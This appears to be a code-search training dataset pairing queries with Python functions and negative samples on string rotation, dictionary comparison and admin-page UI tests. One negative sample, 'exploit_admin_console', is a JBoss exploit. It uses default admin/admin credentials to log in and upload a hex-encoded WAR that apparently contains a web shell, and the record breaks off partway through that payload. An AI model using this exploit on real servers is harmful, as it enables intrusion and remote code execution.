    assert string_rotation('hello', 'elloh') is True
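
The string_rotation implementation itself is not part of this row; a minimal standalone sketch of the check these tests exercise, using the usual "B is a rotation of A iff B occurs in A + A" trick, would be (illustrative names, not the project's own module):

# Minimal standalone sketch: b is a rotation of a iff the lengths match
# and b occurs inside a concatenated with itself.
def is_rotation(a: str, b: str) -> bool:
    return len(a) == len(b) and b in a + a

assert is_rotation('hello', 'elloh') is True
assert is_rotation('hello', 'nothello') is False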
|
[
"def test_string_rotration_false():\n from string_rotation import string_rotation\n assert string_rotation('hello', 'nothello') is False",
"def string_rotation(str1, str2):\n if len(str1) == len(str2):\n return is_substring(str1+str1, str2)\n return False",
"def IsRotation(a,b):\n\trotation = 0\n\trotate_max = len(a)\n\n\twhile rotation < rotate_max:\n\t\trotation += 1\n\n\t\tif a == b:\n\t\t\treturn True\n\n\t\ta = a[-1] + a[:-1]\n\n\treturn False",
"def rotateString(self, A: str, B: str) -> bool:\n return len(A) == len(B) and B in A + A",
"def rotateString(self, A: str, B: str) -> bool:\n # Concatenate A with itself and then search for B\n return len(A) == len(B) and B in (A + A)",
"def valid_rotation(self, rot):\n # Is this a valid rotation?\n if not rot in Rotation:\n if self.verbose: print(f\"Invalid rot {rot}, must be a Rotation.\") \n return False \n\n return True",
"def check_rotation(raster_one, raster_two):\n test = (raster_one.rotone == raster_two.rotone) and \\\n (raster_one.rottwo == raster_two.rottwo)\n return test",
"def test_rotate_90_right(self):\n self.rover.rotate_90_right()\n self.assertEqual(self.rover.cardinalPoint, 'S'), \"should be S\"",
"def is_rotated(array_1, array_2):\n if len(array_1) != len(array_2):\n return False\n if array_1 == array_2:\n return True\n if set(array_1) != set(array_2):\n return False\n index = array_1.index(array_2[0])\n return (array_2 == (array_1[index:] + array_1[:index]))",
"def fromString(self, str: 'SbString') -> \"SbBool\":\n return _coin.SbRotation_fromString(self, str)",
"def test_encrypt_lowercase():\n output = rot13.encrypt(\"abc\")\n assert output == \"nop\"",
"def motor_rotating(self):\n self.write_line('MOTOR:ROTATE?')\n rotation_text = self.read_line()\n rotation = bool(int(rotation_text))\n return rotation",
"def test_RotatE():\n testing_function('rotate')",
"def reference_is_rotated(self):\n if (\n np.allclose(self.axis_u, (1, 0, 0))\n and np.allclose(self.axis_v, (0, 1, 0))\n and np.allclose(self.axis_w, (0, 0, 1))\n ):\n return False\n return True",
"def test_encrypt_uppercase():\n output = rot13.encrypt(\"ABC\")\n assert output == \"NOP\"",
"def test_generate_rotation_rotor_and_angle(self):\n from clifford.tools.g3 import generate_rotation_rotor, random_unit_vector, angle_between_vectors\n\n euc_vector_m = random_unit_vector()\n euc_vector_n = random_unit_vector()\n theta = angle_between_vectors(euc_vector_m, euc_vector_n)\n print(theta)\n\n rot_rotor = generate_rotation_rotor(theta, euc_vector_m, euc_vector_n)\n v1 = euc_vector_m\n v2 = rot_rotor*euc_vector_m*~rot_rotor\n theta_return = angle_between_vectors(v1, v2)\n print(theta_return)\n\n testing.assert_almost_equal(theta_return, theta)\n testing.assert_almost_equal(euc_vector_n.value, v2.value)",
"def test_rotate_pdfrw_90(self):\n rotation = 90\n rotated = Rotate(self.pdf_path, rotation, suffix='rotated_pdfrw', tempdir=self.temp.name, method='pdfrw').file\n\n # Assert rotated pdf file exists\n self.assertTrue(os.path.isfile(rotated))\n\n # Assert pdf file was rotated by the correct amount of degrees\n self.assertEqual(Info(rotated).rotate, rotation)\n return rotated",
"def test_change_orientation_S(self):\n\t\torientation = 'E'\n\t\tspin = 'R'\n\t\tres = marsRover.changeOrientation(orientation, spin)\n\t\tself.assertEqual(res, 'S')",
"def test_rotate_90_left(self):\n self.rover.rotate_90_left()\n self.assertEqual(self.rover.cardinalPoint, 'N'), \"should be N\""
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Compare dict1 keys with dict2 keys and see if dict1 has extra keys compared to dict2
|
def compare_dict_keys(dict1, dict2):
    return dict1.keys() - dict2.keys()
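
A quick usage sketch (values made up for illustration): dict.keys() views support set difference, so the call returns the keys present only in the first dict.

# Illustrative usage of compare_dict_keys.
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'a': 10, 'b': 20}
print(sorted(compare_dict_keys(d1, d2)))  # ['c'] -> keys in d1 but not in d2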
|
[
"def cmp_dict(d1, d2, ignore_keys=[]):\n # https://stackoverflow.com/questions/10480806/compare-dictionaries-ignoring-specific-keys\n return {k: v for k, v in d1.items() if k not in ignore_keys} \\\n == {k: v for k, v in d2.items() if k not in ignore_keys}",
"def compare_dicts_structure(dict1, dict2):\n return sorted(describe_dict(dict1)) == sorted(describe_dict(dict2))",
"def detect_change(first: Dict[str, str], second: Dict[str, str],\n compareKeys: [str]) -> bool:\n for key in compareKeys:\n if key not in second or key not in first:\n return True\n if first[key] != second[key]:\n return True\n return False",
"def cmp_dicts(d1, d2):\n # First test the keys\n for k1 in d1.keys():\n if k1 not in d2:\n return False\n for k2 in d2.keys():\n if k2 not in d1:\n return False\n # Now we need to test the contents recursively. We store the results of\n # each recursive comparison in a list and assert that they all must be True\n # at the end\n comps = []\n for k1, v1 in d1.items():\n v2 = d2[k1]\n if isinstance(v1, dict) and isinstance(v2, dict):\n comps.append(cmp_dicts(v1, v2))\n else:\n if v1 != v2:\n return False\n return all(comps)",
"def compareKeys(currDict, formerDict):\n diff = {}\n for key in currDict:\n if currDict.get(key) != formerDict.get(key):\n diff[key] = currDict.get(key)\n return diff",
"def _dict_is_part_of(dict_a, dict_b):\n dict_a, dict_b = CaseInsensitiveDict(dict_a), CaseInsensitiveDict(dict_b)\n for key, value in dict_b.items():\n if key not in dict_a or dict_a[key] != value:\n return False\n return True",
"def check_fields(dict1, dict2):\n for key, value in dict1.items():\n if isinstance(value, dict):\n if not isinstance(dict2.get(key), dict):\n return False\n check_fields(value, dict2.get(key))\n elif value != dict2.get(key):\n return False\n return True",
"def recursive_compare_dicts(d1, d2):\n nt.assert_equal(set(d1.keys()), set(d2.keys()))\n for key in d1:\n if isinstance(d1[key], (list)):\n try:\n nt.assert_list_equal(d1[key], list(d2[key]))\n except (AssertionError, TypeError) as err:\n print('d1:', key, 'key value type:', type(d1[key]),\n 'data type:', type(d1[key][0]), d1[key])\n print('d2:', key, 'key value type', type(d1[key]),\n 'data type:', type(d2[key][0]), d2[key])\n raise err\n elif isinstance(d1[key], (np.ndarray)):\n if np.issubdtype(d1[key].dtype, np.string_):\n nt.assert_true(np.array_equal(d1[key], np.asarray(d2[key])))\n else:\n try:\n nt.assert_true(np.allclose(d1[key], np.asarray(d2[key])))\n except (AssertionError, TypeError) as err:\n print('d1:', key, 'key value type:', type(d1[key]),\n 'data type:', type(d1[key][0]), d1[key])\n print('d2:', key, 'key value type', type(d1[key]),\n 'data type:', type(d2[key][0]), d2[key])\n raise err\n elif isinstance(d1[key], dict):\n recursive_compare_dicts(d1[key], d2[key])\n elif isinstance(d1[key], (float, np.float, np.float32)):\n nt.assert_true(np.allclose(d1[key], d2[key]))\n else:\n nt.assert_equal(d1[key], d2[key])",
"def _assert_dict_eq(a, b):\n err = 1e-5\n for k in set(a.keys()).union(set(b.keys())):\n if a[k] == b[k]:\n continue\n try:\n if abs(a[k] - b[k]) > err:\n raise AssertionError(f\"{k}: {a[k]} != {b[k]}\")\n except TypeError: # can't take abs, nan\n raise AssertionError(f\"{a[k]} != {b[k]}\")",
"def is_subdict(json1, json2, desc1=\"json1\", desc2=\"json2\", verbose=True):\n\n def out(x):\n if verbose:\n PRINT(x)\n\n def sorted_set_repr(x):\n return f\"{{{repr(sorted(x))[1:-1]}}}\"\n\n def recurse(json1, json2, path=\"\"):\n if isinstance(json1, dict) and isinstance(json2, dict):\n k1 = set(json1.keys())\n k2 = set(json2.keys())\n result = k1 <= k2\n if result:\n if k1 != k2:\n out(f\"Non-fatal keyword mismatch at {path!r}:\")\n out(f\" {desc1} keys: {sorted_set_repr(k1)}\")\n out(f\" {desc2} keys: {sorted_set_repr(k2)}\")\n result = all(recurse(value, json2[key], path=f\"{path}.{key}\")\n for key, value in json1.items())\n if not result:\n # out(f\"Recursive failure at {path!r} in object comparison\")\n pass\n else:\n out(f\"Failed at {path!r} in object comparison due to key set mismatch:\")\n out(f\" {desc1} keys: {sorted_set_repr(k1)}\")\n out(f\" {desc2} keys: {sorted_set_repr(k2)}\")\n elif isinstance(json1, list) and isinstance(json2, list):\n len1 = len(json1)\n len2 = len(json2)\n result = len1 == len2\n if not result:\n out(f\"Failed at {path!r} in list comparison due to length mismatch: {len1} vs {len2}\")\n else:\n result = all(recurse(json1[i], json2[i], path=f\"{path}[{i}]\") for i in range(len1))\n if not result:\n # out(f\"Recursive failure at {path!r} in list comparison\")\n pass\n elif type(json1) == type(json2):\n result = json1 == json2\n if not result:\n out(f\"Failed at {path!r} due to value mismatch: {json.dumps(json1)} != {json.dumps(json2)}\")\n else:\n result = False\n if not result:\n out(f\"Type mismatch ({json1.__class__.__name__} vs {json2.__class__.__name__}) at {path!r}:\")\n out(f\" {desc1}: {json1}\")\n out(f\" {desc2}: {json2}\")\n return result\n return recurse(json1, json2)",
"def dicts_equal(lhs, rhs):\n if len(lhs.keys()) != len(rhs.keys()):\n return False\n\n for key, val in anyconfig.compat.iteritems(rhs):\n val_ref = lhs.get(key, None)\n if val != val_ref:\n return False\n\n return True",
"def dict_diff(d1, d2):\n return DictPatch(\n {k: v for k, v in d2.items() if k not in d1 or d1[k] != v},\n [k for k in d1 if k not in d2],\n )",
"def PrintDictDiff( d1, d2 ):\n\n d1only = [ k1 for k1 in list(d1.keys()) if k1 not in d2 ]\n d2only = [ k2 for k2 in list(d2.keys()) if k2 not in d1 ]\n diffVals = [ k for k in list(d1.keys()) if k in list(d2.keys()) and d1[k] != d2[k] ]\n\n print('d1only=', d1only, ' d2only=', d2only, ' diffVals=', diffVals)",
"def intersection_of_two_dicts(dict1, dict2):\n\t# identify the smaller of the two dictionaries\n\tcheck_dict = None\n\tif len(dict1) < len(dict2):\n\t\tcheck_dict = dict1\n\telse: check_dict = dict2\n\t# find the common elements i.e. a spelling error in both dictdionaries\n\tmy_dict = dict()\n\tfor d1 in dict1:\n\t\tif d1 in dict2:\n\t\t\tmy_dict[d1] = list(set(dict1[d1] + dict2[d1]))\n\treturn my_dict",
"def and_dict(dict1, dict2):\n dict3 = {}\n for key in dict1.keys():\n dict3[key] = dict1[key] & dict2.get(key, False)\n return dict3",
"def confirm_dict_equality(dict1, dict2):\n if dict1 == dict2:\n pass\n else:\n # log this\n request.status_code = 500\n raise VCSManagerError('The built dictionaries are not identical. Yikes.')",
"def delta(dict1,dict2):\n res = {}\n for k,v in dict1.iteritems():\n if k not in dict2:\n res[k] = v\n elif dict2[k] != v:\n if isinstance(dict2[k],dict) and isinstance(v,dict):\n res[k] = delta(v,dict2[k])\n else:\n res[k] = v\n return res",
"def dict_diff(first, second):\n diff = {}\n # Check all keys in first dict\n for key in first.keys():\n if (not second.has_key(key)):\n diff[key] = (first[key], KEYNOTFOUND)\n elif (first[key] != second[key]):\n diff[key] = (first[key], second[key])\n # Check all keys in second dict to find missing\n for key in second.keys():\n if (not first.has_key(key)):\n diff[key] = (KEYNOTFOUND, second[key])\n return diff",
"def assertDictEquals(self, dictionary1, dictionary2, depth=[]):\n d1_keys = dictionary1.keys()\n d1_keys.sort()\n\n d2_keys = dictionary2.keys()\n d2_keys.sort()\n\n self.failUnlessEqual(d1_keys, d2_keys,\n \"Dictionary keys do not match, %s vs %s\" % (\n d1_keys, d2_keys))\n for key, value in dictionary1.items():\n if isinstance(value, collections.Mapping):\n # go recursive\n depth.append(key)\n self.assertDictEquals(value, dictionary2[key], depth)\n else:\n self.failUnlessEqual(value, dictionary2[key],\n \"Dictionary values do not match for key '%s' \"\n \"(%s vs %s) at depth: %s.\\nDictionary 1: %s\\n\"\n \"Dictionary 2: %s\\n\" % (\n key, value, dictionary2[key], \".\".join(depth),\n prettydump(dictionary1), prettydump(dictionary2)))"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Log in as Admin. Click on User Menu for dropdown. Click on 'Admin' on user menu. Click "Stats". Click "Concept Coach". The user is presented with Concept Coach Statistics (t2.07.01). Corresponds to... t2.07.01
|
def test_view_stats_admin(self):
    # t2.07.01 --> The user is presented with Concept Coach Statistics
    self.admin.login()
    self.admin.goto_admin_control()
    self.admin.sleep(5)
    self.admin.wait.until(
        expect.visibility_of_element_located(
            (By.PARTIAL_LINK_TEXT, 'Stats')
        )
    ).click()
    self.admin.wait.until(
        expect.visibility_of_element_located(
            (By.PARTIAL_LINK_TEXT, 'Concept Coach')
        )
    ).click()
    assert ('/stats/concept_coach' in self.admin.current_url()), \
        'Not viewing Concept Coach stats'
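
The two wait-then-click blocks above follow the same pattern; a generic helper written against plain Selenium could factor it out. This is a sketch assuming standard selenium imports, not the project's own `admin` wrapper object.

# Sketch only: a generic wait-then-click helper using plain Selenium.
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as expect

def click_partial_link(driver, link_text, timeout=10):
    # Wait until the partial-link-text match is visible, then click it.
    WebDriverWait(driver, timeout).until(
        expect.visibility_of_element_located((By.PARTIAL_LINK_TEXT, link_text))
    ).click()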
|
[
"def test_admin_dashboard_page(self):\n response = self.client.get('/admin/')\n self.assertContains(\n response,\n '<h2>User graph</h2>',\n html=True,\n )\n self.assertContains(\n response,\n '<h2>User logged in graph</h2>',\n html=True,\n )\n self.assertContains(\n response,\n '<svg style=\"width:100%;height:300px;\"></svg>',\n html=True,\n )\n self.assertContains(\n response,\n '<option value=\"true\">Active</option>',\n html=True,\n )\n self.assertContains(\n response,\n '<option value=\"false\">Inactive</option>',\n html=True,\n )",
"def open_menu_section(self, url):\n if url == ADMIN_USERS:\n self.click_on_element_by_css(adpl.DASHBOARD_USERS)\n elif url == ADMIN_USERS_STATUSES:\n self.click_on_element_by_css(adpl.DASHBOARD_USERS_STATUSES)\n elif url == ADMIN_ROLE_REQUESTS:\n self.click_on_element_by_css(adpl.DASHBOARD_ROLE_REQUESTS)\n elif url == ADMIN_LOGS:\n self.click_on_element_by_css(adpl.DASHBOARD_LOGS)\n self.wait.until(base_page.EC.url_to_be(url))",
"def change_menu_of_dashboard_to(self, url):\n self.open_admin_side_menu()\n if url == ADMIN_USERS:\n self.click_on_element_by_css(adpl.MANAGE_USERS_SIDE_MENU)\n elif url == ADMIN_USERS_STATUSES:\n self.click_on_element_by_css(adpl.USERS_STATUSES_SIDE_MENU)\n elif url == ADMIN_ROLE_REQUESTS:\n self.click_on_element_by_css(adpl.ROLE_REQUESTS_SIDE_MENU)\n elif url == ADMIN_LOGS:\n self.click_on_element_by_css(adpl.LOGS_SIDE_MENU)\n self.wait.until(base_page.EC.url_to_be(url))",
"def main_menu(self) -> None:\n logger.info(\"logged in as GP\")\n while True:\n Parser.print_clean(\"You're currently viewing main menu options for GP {}.\".format(self.username))\n self.print_information()\n option_selection = Parser.selection_parser(\n options={\"A\": \"View/Edit availability\", \"M\": \"Manage bookings\", \"V\": \"View/Start appointment\",\n \"U\": \"update your profile\", \"--logout\": \"Logout\"})\n\n if option_selection == \"--logout\":\n # Quitting is required for logout to ensure all personal data is cleared from session\n logger.info(\"User Logged Out\")\n Parser.print_clean(\"Logging you out...\")\n Parser.user_quit()\n\n elif option_selection == \"A\":\n self.edit_availability()\n elif option_selection == \"M\":\n self.manage_bookings()\n elif option_selection == \"V\":\n self.view_appointment()\n elif option_selection == \"U\":\n self.edit_information()",
"def account_admin_menu(request):\n NAV_MENU = {\n \"100\": {\n \"name\": \"Switch User\",\n \"reversible\": \"userware_switch_on\",\n \"url\": \"\",\n \"pre_login_visible\": False,\n \"post_login_visible\": True,\n \"superuser_required\": False,\n \"staff_required\": True,\n \"icon\": \"icon-group\",\n 'sub_menu': None,\n },\n \"200\": {\n \"name\": \"Database Backend\",\n \"reversible\": \"admin:index\",\n \"url\": \"\",\n \"pre_login_visible\": False,\n \"post_login_visible\": True,\n \"superuser_required\": False, # superuser should be set as staff as well \n \"staff_required\": True,\n \"icon\": \"icon-tasks\",\n 'sub_menu': None,\n },\n }\n\n return build_menu(request, NAV_MENU)",
"def show_main_menu(self):\n\n # Display a welcome message\n print(\"\"\" \n ___ \n /'___\\ \n /\\ \\__/ __ ___ ___ \n \\ \\ ,__\\/'__`\\ /' __` __`\\ \n \\ \\ \\_/\\ \\L\\.\\_/\\ \\/\\ \\/\\ \\ \n \\ \\_\\\\ \\__/.\\_\\ \\_\\ \\_\\ \\_\\\\\n \\/_/ \\/__/\\/_/\\/_/\\/_/\\/_/ \n \"\"\")\n\n # Prompt user to register, login, or exit the F.A.M until they choose a valid option.\n while True:\n print(\"\\n Family Appointed Moderator\")\n print(\"----------------------------------------\")\n print(\n \"1 - Register new user\\n\"\n \"2 - Login\\n\"\n \"3 - Exit\\n\"\n )\n\n try:\n choice = int(input(\"Enter your choice: \"))\n except ValueError:\n print(\"\\nInvalid choice. Please try again.\")\n continue\n\n if choice == 3:\n return\n elif choice > 3 or choice < 0:\n print(\"\\nInvalid choice. Please try again.\")\n else:\n input_map = {\n 1: self._register_user,\n 2: self._login_user,\n }\n\n # Catch any string values\n try:\n operation = input_map[choice]\n except ValueError:\n print(\"Invalid choice. Please try again.\")\n continue\n\n # Move to the actions menu after a user is logged in or registered\n if operation():\n try:\n self._show_actions_menu()\n except UserIsLockedError as e:\n print(e)",
"def admin_session(c_list, a_list):\n id_location = login(a_list)\n if id_location == -1:\n return\n else:\n while True:\n what_to_do = int(\n input('Enter 1 to show class roster, 2 to change max class size, 0 to exit: '))\n if what_to_do == 1:\n a_list[id_location].show_roster(c_list)\n elif what_to_do == 2:\n a_list[id_location].change_max_size(c_list)\n else:\n return",
"def _show_actions_menu(self):\n while True:\n # Check if a user is locked, if so exit out of the actions menu\n if self.current_user.can_lock_account():\n raise UserIsLockedError(\"Your account is locked. We have logged you out\")\n\n print(f\"\\nLogged in as {self.current_user.name}\\n\")\n\n # options:\n print(\"Actions menu:\\n\"\n \"----------------\\n\"\n \"1 - View budgets\\n\"\n \"2 - Record transaction\\n\"\n \"3 - View transactions by budget\\n\"\n \"4 - View bank account details\\n\"\n \"5 - Logout\\n\"\n )\n\n try:\n option = int(input(\"Please enter the number your selection: \"))\n except ValueError:\n print(\"Invalid choice. Please try again.\")\n continue\n # option 5 = LOGOUT, back to main menu\n if option == 5:\n return\n else:\n # performs the action selected by the user.\n self._perform_action(option)",
"def verify_admin_menu(self):\n admin_id = get_param('What is your admin ID?', self.screen)\n password = get_param('What is your password?', self.screen)\n\n admin = verify_admin(admin_id, password)\n\n if admin:\n self.screen.clear()\n self.screen.border(0)\n self.screen.addstr(12, 40, 'Logged in successfully as admin.')\n self.screen.addstr(13, 40, 'Press any key to continue.')\n self.screen.refresh()\n\n pause = chr(self.screen.getch())\n self.admin_menu()\n else:\n self.screen.clear()\n self.screen.border(0)\n self.screen.addstr(12, 40, 'Admin login failed.')\n self.screen.addstr(13, 40, 'Press any key to continue.')\n self.screen.refresh()\n\n pause = chr(self.screen.getch())\n self.unlogged_in_menu()",
"def open_admin_side_menu(self):\n self.click_on_element_by_css(adpl.ADMIN_SIDE_NAVIGATION_MENU)",
"def click_account(self):\n self.find_element_by_xpath(self.profile_menu_xpath).click()\n element = WebDriverWait(self.driver, 30).until(EC.element_to_be_clickable((By.XPATH, self.account_btn_xpath)))\n did_scroll = element.location_once_scrolled_into_view\n element.click()",
"def test_get_user_level_access(self):\n pass",
"def user(ctx):\n pass",
"def exploit_admin_console(url):\n # Use default password for Jboss 5 and 6\n username = \"admin\"\n password = \"admin\"\n headers = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Connection\": \"keep-alive\",\n \"User-Agent\": user_agents[randint(0, len(user_agents) - 1)]}\n\n r = pool.request('GET', url+\"/admin-console/login.seam\", headers=headers)\n cookie = r.getheader('set-cookie').split(\";\")[0]\n headers['Cookie'] = cookie\n state = get_viewstat_admin_console(r.data)\n #payload = (\"login_form=login_form&login_form:name=%s&login_form:password=%s&login_form:submit=Login\"\n # \"&javax.faces.ViewState=%s\" % (username, password, state))\n payload = \"login_form=login_form&login_form%3Aname=\"+username+\"&login_form%3Apassword=\"+password+\"&login_form%3Asubmit=Login&javax.faces.ViewState=\"+url_encode(state)\n headers['Content-Type'] = \"application/x-www-form-urlencoded\"\n print(GREEN + \"\\n * Info: Trying to perform authentication with default credentials...\" +ENDC)\n r = pool.request('POST', url+\"/admin-console/login.seam\", body=payload, headers=headers, redirect=False)\n state = get_viewstat_admin_console(r.data)\n if r.status == 302:\n print(GREEN + \" * Info: Successfully logged in! Wait...\" + ENDC)\n location = r.getheader('Location')\n conversation_id = location.split('=')[1]\n r = pool.request('GET', location, headers=headers)\n if state == None:\n sleep(7)\n r = pool.request('GET', url+\"/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR\"\n \"%29&conversationId=\"+conversation_id+\"&conversationPropagation=end\", headers=headers)\n conversation_id = str(int(conversation_id)+1)\n r = pool.request('GET', url+\"/admin-console/secure/resourceTypeSummary.seam?actionMethod=secure%2FresourceType\"\n \"Summary.xhtml%3AcreateContentBackedResourceAction.init%28%29&conversationId=\"\n + conversation_id, headers=headers)\n state = get_viewstat_admin_console(r.data)\n\n headers['Content-Type'] = \"multipart/form-data; boundary=---------------------------8994251555011888521050172030\"\n\n payload = (\"\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\\x00\\x00\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x00\\x04\\x00\\x4d\\x45\\x54\\x41\\x2d\\x49\\x4e\"\n \"\\x46\\x2f\\xfe\\xca\\x00\\x00\\x03\\x00\\x50\\x4b\\x07\\x08\\x00\\x00\\x00\\x00\\x02\\x00\\x00\"\n \"\\x00\\x00\\x00\\x00\\x00\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x6d\\x7c\\x98\\x48\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x00\\x00\\x4d\\x45\\x54\"\n \"\\x41\\x2d\\x49\\x4e\\x46\\x2f\\x4d\\x41\\x4e\\x49\\x46\\x45\\x53\\x54\\x2e\\x4d\\x46\\xf3\\x4d\"\n \"\\xcc\\xcb\\x4c\\x4b\\x2d\\x2e\\xd1\\x0d\\x4b\\x2d\\x2a\\xce\\xcc\\xcf\\xb3\\x52\\x30\\xd4\\x33\"\n \"\\xe0\\xe5\\x72\\x2e\\x4a\\x4d\\x2c\\x49\\x4d\\xd1\\x75\\xaa\\x04\\x09\\x58\\xe8\\x19\\xc4\\x9b\"\n \"\\x9b\\x2b\\x68\\xf8\\x17\\x25\\x26\\xe7\\xa4\\x2a\\x38\\xe7\\x17\\x15\\xe4\\x17\\x25\\x96\\x00\"\n \"\\x95\\x6b\\xf2\\x72\\xf1\\x72\\x01\\x00\\x50\\x4b\\x07\\x08\\x05\\xa0\\x0e\\xbc\\x43\\x00\\x00\"\n \"\\x00\\x44\\x00\\x00\\x00\\x50\\x4b\\x03\\x04\\x14\\x00\\x08\\x08\\x08\\x00\\x68\\x7c\\x98\\x48\"\n \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\\x00\\x00\\x6a\\x65\\x78\"\n \"\\x77\\x73\\x33\\x2e\\x6a\\x73\\x70\\x95\\x55\\x5f\\x6f\\x1a\\x39\\x10\\x7f\\xbf\\x4f\\x31\\xb1\"\n \"\\x94\\xca\\x94\\xb2\\xb4\\xba\\x97\\x53\\x08\\xd1\\xa5\\xb9\\x54\\x69\\x14\\xe9\\x22\\x52\\xae\"\n 
\"\\x0f\\xa7\\xaa\\x32\\xbb\\x03\\xeb\\x74\\xd7\\xf6\\xd9\\xb3\\x05\\x94\\xf2\\xdd\\x6f\\xec\\x05\"\n \"\\x02\\x85\\x6b\\x75\\x2f\\xbb\\xc6\\x33\\x9e\\x9d\\xf9\\xfd\\x31\\xe7\\xa7\\xbf\\x83\\x53\\x33\"\n \"\\x04\\x5d\\x3b\\xeb\\x69\\x28\\x1e\\xd5\\x57\\x95\\x35\\xa4\\xab\\xec\\xe5\\xab\\xb4\\xd6\\x96\"\n \"\\x57\\x90\\x96\\x06\\x29\\x7b\\x29\\x52\\xfe\\xb5\\xc9\\x6d\\xa1\\xcd\\x6c\\x28\\xc6\\x1f\\xde\"\n \"\\xf5\\x7e\\x13\\xa7\\x17\\x70\\xee\\x3c\\xf2\\xf3\\x14\\xb4\\x21\\xf8\\x8a\\x3e\\x68\\x6b\\x60\"\n \"\\x08\\xbf\\x0e\\x40\\x4f\\x41\\x7a\\xfc\\xa7\\xc1\\x40\\xd9\\x0c\\xe9\\x5e\\x79\\x55\\x23\\xa1\"\n \"\\x97\\xc2\\x39\\x27\\x3a\\x70\\x32\\x04\\xd3\\x54\\x55\\x07\\x9e\\x60\\x62\\x6d\\x85\\xca\\x40\"\n \"\\x5e\\x62\\xfe\\x65\\xec\\x0a\\x45\\x18\\x06\\x70\\x43\\xe4\\xc6\\xa3\\xbb\\x2b\\x6b\\x0c\\xe6\"\n \"\\x14\\xeb\\xe6\\xbc\\xbc\\xda\\xc9\\x81\\xb6\\xc4\\x00\\xde\\x36\\xd3\\x29\\x7a\\x2c\\x46\\xa8\"\n \"\\x0a\\xf4\\x30\\xf1\\xdb\\x88\\xc7\\xe0\\xac\\x09\\x98\\x05\\x24\\xae\\x44\\x68\\xe8\\xc3\\xd2\"\n \"\\xa1\\x14\\x84\\x0b\\xea\\x97\\x54\\x57\\xa2\\x73\\xd0\\xeb\\x4d\\x2a\\x23\\x45\\xea\\xa7\\xd7\"\n \"\\xb4\\x1f\\x7b\\x6e\\x19\\x5e\\xbc\\x80\\x9f\\x67\\x67\\x9c\\xa1\\xaa\\x20\\xc5\\x94\\x9f\\x28\"\n \"\\x3a\\x9d\\xa7\\xbd\\xf9\\xb8\\xc3\\x14\\x18\\xc0\\x0a\\xf9\\x05\\x07\\x51\\xf2\\x0d\\x07\\x8f\"\n \"\\x8c\\x2c\\x0f\\x80\\xe9\\x80\\xc1\\x39\\xf0\\x96\\x14\\x25\\xc7\\xce\\xfa\\xfd\\x39\\x4e\\x42\"\n \"\\x89\\x55\\x95\\x3d\\xe2\\x62\\x62\\x43\\x88\\x2c\\xf6\\x1f\\x83\\xfb\\xbc\\xa6\\x28\\xa3\\x05\"\n \"\\x71\\x8b\\xd6\\xa1\\x79\\x2e\\x23\\x19\\x89\\x15\\x3c\\x90\\x67\\x8a\\x21\\x94\\xfc\\xa9\\x1f\"\n \"\\xf0\\x37\\xd8\\x24\\x56\\x2a\\xd0\\x8d\\x6d\\x7c\\xea\\x32\\xb6\\x17\\x7b\\xf9\\x83\\x7b\\x95\"\n \"\\x9d\\x8c\\x6c\\x9b\\xc4\\xcb\\xe0\\x2a\\x4d\\x52\\x9c\\x89\\xce\\xdf\\xaf\\x3f\\x75\\x45\\x99\"\n \"\\x55\\x76\\xc6\\x1d\\x78\\x74\\x95\\xca\\xf1\\xb2\\xaa\\xa4\\x00\\xf1\\x0a\\x44\\x2f\\x96\\x26\"\n \"\\xbf\\x7c\\x4a\\xa4\\xec\\x63\\xd2\\x82\\x12\\x81\\xfc\\x0e\\x95\\xc8\\xee\\xa8\\xed\\xf5\\xde\"\n \"\\xf3\\x50\\x9e\\x96\\x52\\x8c\\x03\\xfa\\xde\\xe5\\x8c\\x19\\xe7\\xba\\x47\\xf8\\xba\\xb1\\x81\"\n \"\\x31\\xe8\\x8a\\xf3\\x9e\\xe8\\xee\\x84\\x47\\x58\\x5b\\xc2\\xcb\\xa2\\xf0\\xb2\\xb3\\x96\\xc6\"\n \"\\x49\\x1c\\xe9\\x9d\\xae\\x70\\x4d\\xf2\\x67\\xd1\\xdd\\x9b\\x9a\\xb9\\x5e\\xe8\\x40\\x41\\x46\"\n \"\\x92\\xef\\x79\\x60\\xfa\\xe8\\x35\\x43\\x05\\xf3\\xf6\\x35\\x4c\\xfc\\xec\\x04\\xfe\\xab\\xce\"\n \"\\x60\\x7d\\x22\\xcb\\x2b\\x1b\\x30\\xf2\\x31\\xd9\\x9c\\xde\\x97\\x78\\x02\\xf9\\xbd\\x71\\x0d\"\n \"\\x31\\xc0\\xa8\\xea\\xf5\\xee\\x01\\x2e\\x3c\\xcf\\x4e\\x16\\xf7\\x17\\x27\\x62\\xa7\\xc6\\xcf\"\n \"\\xfe\\xb5\\x75\\xeb\\x7b\\xf6\\xc5\\x8c\\xbf\\xea\\x94\\x0f\\xc8\\x3f\\xe4\\xc4\\x33\\x31\\xaa\"\n \"\\xb8\\xd3\\x06\\x9f\\xa9\\x03\\xa6\\xee\\xcd\\xa7\\x35\\x24\\xbb\\x05\\x2e\\x36\\xc6\\xe7\\xe9\"\n \"\\x6d\\x43\\x99\\x8b\\x83\\x4a\\x71\\xcf\\x9e\\x66\\x61\\x1b\\x46\\xf3\\x0c\\xa8\\xe4\\xe6\\x41\"\n \"\\x07\\x60\\x9b\\xb7\\x16\\x01\\xb2\\x70\\x8b\\x8b\\xb7\\xac\\x4e\\xb8\\x7d\\xb8\\x87\\x8f\\x1b\"\n \"\\xc9\\xf2\\x8a\\xe9\\xca\\x6d\\x5d\\xa3\\x29\\xf8\\xa0\\x22\\x58\\xda\\x86\\xb7\\x7c\\x63\\x62\"\n 